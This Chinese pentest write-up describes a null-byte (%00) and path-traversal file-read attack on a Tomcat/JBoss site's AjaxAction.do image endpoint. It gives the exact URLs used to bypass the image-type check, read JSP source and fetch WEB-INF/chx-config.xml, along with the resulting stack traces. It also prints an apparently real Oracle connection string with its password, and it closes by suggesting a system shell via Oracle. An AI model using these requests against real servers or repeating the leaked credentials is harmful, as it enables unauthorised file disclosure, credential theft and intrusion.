tomcat和jboss网站%00欺骗

tomcat+jboss，站点交互功能很少，漏洞扫描器没发现什么问题。

手工一个一个文件慢慢翻，翻了好多发现有的文章提示“没有图片”，也就是说可能有的文章附有图片了。一个个找终于看到一张图片，右键查看一下图片URL，发现有些可疑：

http://webhost/AjaxAction.do?actionType=showimage&id=1101110623085223t.jpg

试一下改变成：

http://webhost/AjaxAction.do?actionType=showimage&id=111actionType=showimage&id=111

出错了：

java.io.IOException: 文件不是图片格式，请检查后继续！只能输出gif、jpg、png三种格式文件！
cn.com.chx.util.ImageUtil.outImageStream(ImageUtil.java:68)
cn.com.chx.eform.AjaxAction.showImage(AjaxAction.java:265)

再试试有没有过滤结束符构造一个合法的：

http://webhost/AjaxAction.do?actionType=showimage&id=111%00.gif

非常有意思，不但得到了web path而且还成功欺骗了程序：

java.io.FileNotFoundException: E:\webhost\server\default\deploy\root.war\WEB-INF\resource\111?3;.gif (系统找不到指定的文件。)
java.io.FileInputStream.open(Native Method)
java.io.FileInputStream.(FileInputStream.java:106)
cn.com.chx.util.ImageUtil.outImageStream(ImageUtil.java:74)

再试试能不能返回上级目录，因为上面暴出了web path，所以退只要两格：

http://webhost/AjaxAction.do?actionType=showimage&id=../../login.jsp%00.gif

哈哈，直接看到了jsp源码~~~
接下来可以去尝试读一下web-inf下面的xml文件：

http://webhost/AjaxAction.do?actionType=showimage&id=../../web-inf/chx-config.xml%00.gif

找到了最重要的oracle密码(直接访问xml访问不了）：
- oracle oracle.jdbc.driver.OracleDriver jdbc:oracle:thin:@localhost:1521:orcl xbox xbox123qwe@#$_web 做渗透测试项目就做到这就可以了，接下来要绕过fw利用oracle获得个systemshell也并非难事